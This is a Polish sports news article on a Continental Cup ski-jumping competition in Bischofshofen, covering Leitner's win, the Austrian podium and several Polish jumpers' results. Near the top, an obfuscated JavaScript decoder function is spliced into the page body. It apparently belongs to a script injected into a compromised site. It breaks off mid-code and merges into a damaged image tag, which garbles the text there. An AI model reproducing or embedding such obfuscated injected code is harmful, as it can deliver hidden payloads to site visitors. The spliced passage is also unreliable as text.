You are currently viewing PK Bischofshofen: Austriackie podium, triumf Leitnera, mocny występ Polaków!
Clemens Leitner (fot. Julia Piątkowska)

PK Bischofshofen: Austriackie podium, triumf Leitnera, mocny występ Polaków!

Clemens Leitner zwyciężył w sobotnim konkursie Pucharu Kontynentalnego w Bischofshofen dzięki skokom na odległość 133 i 135,5 metra. Podium uzupełnili jego reprezentacyjni koledzy, Stefan Huber i Clemens Aigner. Bardzo dobrze spisali się polscy zawodnicy – Aleksander Zniszczoł, Andrzej Stękała i Klemens Murańka. Pięciu Polaków zdobyło dziś punkty.

- PK Bischofshofen: Austriackie podium, triumf Leitnera, mocny występ Polaków!function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Zniszczoł (fot. Julia Piątkowska)" src="http://www.skokipolska.pl/wp-content/uploads/2017/08/Zniszczol_Aleksander_Beskydy.Tour_.2017.Szczyrk_fot.Julia_.Piatkowska-300x200.jpg" alt="Aleksander Zniszczoł (fot. Julia Piątkowska)" width="300" height="200"> Aleksander Zniszczoł (fot. Julia Piątkowska)

Pierwsza seria konkursowa należała do reprezentantów gospodarzy. Na pierwszym miejscu ukończył ją Clemens Leitner (133,0 m), który wyprzedzał swojego kolegę, Stefana Hubera (131,0 m) oraz kolejnego z Austriaków, Clemensa Aignera (129,0 m). Czwarty był obecny lider Pucharu Kontynentalnego Taku Takeuchi (127,0 m), piąte miejsce zajął reprezentant Norwegii, Mats Bjerke Myhren (129,5 m), a szósty był czeski zawodnik, Vojtech Stursa (126,0 m).

Poza czołową trójką znaleźli się polscy zawodnicy: siódmy był Andrzej Stękała (126,5 m), a tuż za nim znaleźli się Aleksander Zniszczoł (124,5 m) i Klemens Murańka (126,5 m). Do serii finałowej awansowali także osiemnasty Paweł Wąsek (122 m / 18. miejsce) i Adam Niżnik (122 m / 27. miejsce). Tomasz Pilch oddał skok na odległość 117,5 metra i niestety nie udało mu się awansować do drugiej serii, zajął 39. miejsce. Na uwagę zasługuje również słaby występ utytułowanego japońskiego "weterana", 47-letniego Noriakiego Kasaiego, który uplasował się dopiero na 37. pozycji.

Stekala Andrzej WC.Planica.2016 fot.Julia .Piatkowska 300x200 - PK Bischofshofen: Austriackie podium, triumf Leitnera, mocny występ Polaków!
Andrzej Stękała (fot. Julia Piątkowska)

W finale austriaccy zawodnicy ponownie nie dali szans rywalom i ostatecznie całe podium należało do nich. Clemens Leitner dominował - dzięki skokowi na 135,5 metra utrzymał prowadzenie, które zajmował na półmetku. Dla 21-letniego zawodnika to już trzecie podium cyklu PK w karierze, jednak po raz pierwszy znalazł się on na jego najwyższym stopniu.

Drugie miejsce ze stratą 14,3 punktów do zwycięzcy, zdobył 25-letni Stefan Huber, który w finale poszybował 130,5 metra. Młodszy z austriackich braci po raz ósmy w karierze znalazł się na podium narciarskiej "drugiej ligi". Trzecia lokata przypadła kolejnemu z reprezentantów gospodarzy, Clemensowi Aignerowi, który utrzymał zajmowaną lokatę po skoku na odległość 131,5 metra. 26-letni zawodnik już po raz 29. w karierze uplasował się w czołowej trójce konkursu PK.

Tuż za austriacką "koalicją" wylądowała trójka reprezentantów Polski. Aleksander Zniszczoł zanotował awans w drugiej serii i ostatecznie zajął czwarte miejsce (124,5 / 132,5 m), piąte miejsce należało do Andrzeja Stękały (126,5 / 131,0 m), natomiast Klemens Murańka zajął ostatecznie szóstą pozycję (126,5 / 129,0 m). Tym samym pod względem drużynowym jest to niewątpliwie najlepszy występ polskiej kadry B tej zimy. Dodajmy, że punktowali również 24. Paweł Wąsek (122,0 / 124,0 m) i 25. Adam Niżnik (122,0 / 122,0 m).